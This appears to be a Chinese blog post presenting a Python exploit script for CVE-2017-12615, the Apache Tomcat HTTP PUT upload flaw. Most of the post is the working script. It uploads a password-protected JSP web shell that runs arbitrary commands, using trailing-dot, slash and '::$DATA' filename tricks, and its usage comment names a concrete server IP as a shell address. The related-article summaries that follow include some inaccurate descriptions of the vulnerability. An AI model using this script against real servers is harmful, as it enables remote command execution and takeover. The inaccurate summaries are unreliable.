[CVE-2017-12615]利用脚本

最新推荐文章于 2024-01-27 16:37:47 发布
最新推荐文章于 2024-01-27 16:37:47 发布
阅读量607 收藏 2
点赞数
分类专栏: python 文章标签: CVE-2017-12615验证脚本
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/89924157
版权 
# coding:utf-8
# author:cbd666

import requests
import sys

'''
Usege:python3 CVE-2017-12615.py http://127.0.0.1/
Shell:http://120.79.66.58:8080/写入的文件?pwd=cbd&cmd=whoami
'''


def attack(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"}
    data = """<%
    if("cbd".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>"""
    code = ['cbd.jsp.', 'cbd.jsp/', 'cbd.jsp::$DATA']
    try:
        for i in range(2):
            requests.put(url + code[i], headers=headers, data=data)  # 发送put请求写入文件
            resp = requests.get(url + code[i][:-1], headers=headers)  # 发送get请求验证是否写入
            if resp.status_code == 200:
                print('写入文件成功,shell地址为 ' + url + code[0][:-1])
                exit()
        requests.put(url + code[2], headers=headers, data=data)
        resp1 = requests.get(url + code[2], headers=headers)
        if resp1.status_code == 200:
            print('写入文件成功,shell地址为 ' + url + code[2])
        print('Exploit结束')
    except:
        "someone is error!!!"


if __name__ == '__main__':
    target_url = sys.argv[1]
    attack(target_url)
小鱼儿waha
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve监控脚本
weixin_42346836的博客
10-16 679
[1]通过监控github api进行cve告警推送 [2]消息推送通过钉钉和server酱推送 [3]默认启用server酱推送 [4]所有推送结果都写入到PGsql中,github_URL为唯一索引 # -*- coding:utf-8 -*- import time, re import json import requests from operator import itemgetter import psycopg2 def timeUp(): ticks = time.strft
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
CVE-2017-12615利用脚本
04-16
CVE-2017-12615利用脚本;tomcat服务器PUT上传导致命令执行。
[工具]Tomcat CVE-2017-12615 远程代码执行
weixin_30236595的博客
01-12 258
工具:K8_TocmatExp编译:VS2012C#(.NETFrameworkv2.0)组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2017/11/2415:21:25简介:Tomcat CVE-2017-12615 远程代码执行漏洞图片: 功能:下载地址:文件:K8_Tocma...
漏洞复现之CVE-2017-12615
Blood_Pupil的博客
03-16 3124
利用方式 MSDN All files on an NTFS volume consist of at least one stream - the main stream – this is the normal, viewable file in which data is stored. The full name of a stream is of the form below. ...
CVE-2017-12615(远程代码执行漏洞)
Biu_Biu_Bi的博客
04-07 2094
当 Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。2、使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本。1、使用冰蝎v4.05生成jsp脚本。5、打开ip:8080,成功开启。4、测试成功上传Shell。
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
CVE-2017-12149正是利用了这一弱点。 该漏洞主要影响JBoss AS 7.x和EAP 6.x版本,这些版本中包含了`org.jboss.remoting3.protocol.ser`包,该包处理反序列化时存在缺陷。攻击者可以通过发送特制的序列化对象到...
44913_sale3ho_CVE-2017-12636_POC_
09-30
这暗示了该PoC包含了一段Python脚本,这段脚本能够触发CVE-2017-12636漏洞。 CVE-2017-12636是一个具体的漏洞标识符,根据常见漏洞和暴露(Common Vulnerabilities and Exposures)系统,它对应的是2017年发现的一...
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
在本例中,`CVE-2017-3506-Poc.py`是一个Python脚本,用于演示如何利用这个漏洞。攻击者可以创建一个带有特定`Content-Type`的HTTP请求,触发Struts2框架的错误解析逻辑,从而执行恶意代码。这个PoC可能包括了以下...
Tomcat任意写入文件漏洞(CVE-2017-12615
黑白的博客
11-22 9404
声明 好好学习,天天向上 漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能
Tomcat任意文件上传(CVE-2017-12615)漏洞复现(附POC)
byt8563的博客
06-30 3865
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞 • 漏洞编号:CVE-2017-12615 • 漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
[CVE-2017-12615]漏洞复现
https://www.cnblogs.com/zpchcbd/
05-07 2506
漏洞编号CVE-2017-12615 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 环境搭建 docker搭建 ubuntu16.04+docker sudo docker-compose up -d 手动搭建 tomcat7.0.0-7.0.81 环境 然后自己去配置当前目录下的/conf/web.xml 添加如下代码: readonly false 利用...
cvemap-CVE漏洞库工具(内含解析脚本)
最新发布
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
01-27 1833
cvemap一个强大的CVE漏洞库+POC库搜索工具。
CVECVE-2020-1983:Tomcat 文件包含漏洞
边扯边淡
05-31 1020
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。Tomcat 版本为 9.0.30。 1、漏洞:任意文件包含 攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。 2、影响版本 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 .
tomcat7.x远程命令执行(CVE-2017-12615)漏洞利用复现
m0_58606546的博客
01-11 4108
一、漏洞前言 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615CVE-2017-12616,该漏洞受影响版本为7.0-7.80之间,在一定条件下,攻击者可以利用这两个漏洞,获取用户服务器上 JSP 文件的源代码,或是通过精心构造的攻击请求,向用户服务器上传恶意JSP文件,通过上传的 JSP 文件 ,可在用户服务器上执行任意代码,从而导致数据泄露或获取服务器权限,存在高安全风险 二、漏洞名称 CVE-2017-12615-远程代
CVE-2017-12615 Tomcat PUT 任意文件上传 漏洞利用教程
凝聚力安全团队
11-14 2206
目录漏洞描述影响版本漏洞环境搭建漏洞检测漏洞利用漏洞加固 漏洞描述   在启用HTTP PUT的Windows上运行Apache Tomcat 7.0.0至7.0.79时(例如,通过将Default的只读初始化参数设置为false),可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。 影响版本 tomcat 7.0.0至7.0.79 漏洞环境搭建 漏洞检测 漏洞利用 漏洞加固 ...
Tomcat文件包含漏洞(CVE-2020-1938)
weixin_41182861的博客
09-25 4050
概述 2020年2月20日,国家信息安全漏洞共享平台(CNVD)发布了Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服务器,因此也可以视作单独的Web服务器。 攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可
TomcatCVE-2020-1938任意文件读取
qq_43665434的博客
05-13 493
TomcatCVE-2020-1983任意文件读取 漏洞原理:传送门 POC地址:传送门 危害等级:高,攻击者利用此漏洞,可未授权读取任意文件,且在一定条件下实现远程代码执行。 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 window10 攻击主机 192.168.1.120 实验流程 启动漏洞靶机centos8 # 进入vulhub目录 cd /usr/sbin/vulhub/tomcat/CVE-2020-1983/ # 创建镜像 dock
Tomcat系列漏洞复现——vulhub
qq_45612828的博客
07-17 1663
Tomcat PUT方法任意写文件漏洞(CVE-2017-12615) Tomcat AJP 文件包含漏洞(CVE-2020-1938) Tomcat7+ 弱口令 && 后台getshell漏洞
cve-2017-12615脚本
09-04
CVE-2017-12615是一个由Apache Tomcat服务器引起的漏洞,它存在于Tomcat服务器的默认配置中。该漏洞使得攻击者能够通过进行远程命令执行来获取服务器的控制权。 该脚本的实现过程如下: 1. 首先,通过发送特制的HTTP请求,攻击者可以将恶意的Web应用程序(如war文件)上传到Tomcat服务器中。 2. 接下来,攻击者发送另一个特制的HTTP请求,触发Tomcat服务器对上传的Web应用程序进行部署。 3. 当Tomcat服务器部署恶意的Web应用程序时,该程序中的恶意代码将被执行。 4. 攻击者可以在恶意代码中包含任意的系统命令,从而实现远程命令执行。 5. 一旦成功执行命令,攻击者就能够在服务器上执行各种操作,例如文件读取/写入、系统信息获取等。 为了防御CVE-2017-12615漏洞,可以采取以下措施: 1. 及时更新和升级Apache Tomcat服务器,确保使用的版本没有漏洞。 2. 将Apache Tomcat和其他组件配置为具有最低特权,以减少潜在攻击者的影响范围。 3. 限制对Tomcat管理接口的访问,并使用强密码和多因素身份验证来保护管理接口。 4. 定期检查服务器上是否存在未知的应用程序文件或恶意代码,并将其删除。 5. 在Tomcat服务器上使用Web应用程序防火墙,以检测和阻止恶意HTTP请求。 6. 实施网络入侵检测系统(IDS)和入侵防御系统(IPS),以便及时检测和阻止攻击。 综上所述,CVE-2017-12615是一个严重的远程代码执行漏洞,攻击者通过利用该漏洞可以获取Tomcat服务器的控制权。为了避免受到此漏洞的攻击,我们必须采取一系列措施来确保Tomcat服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值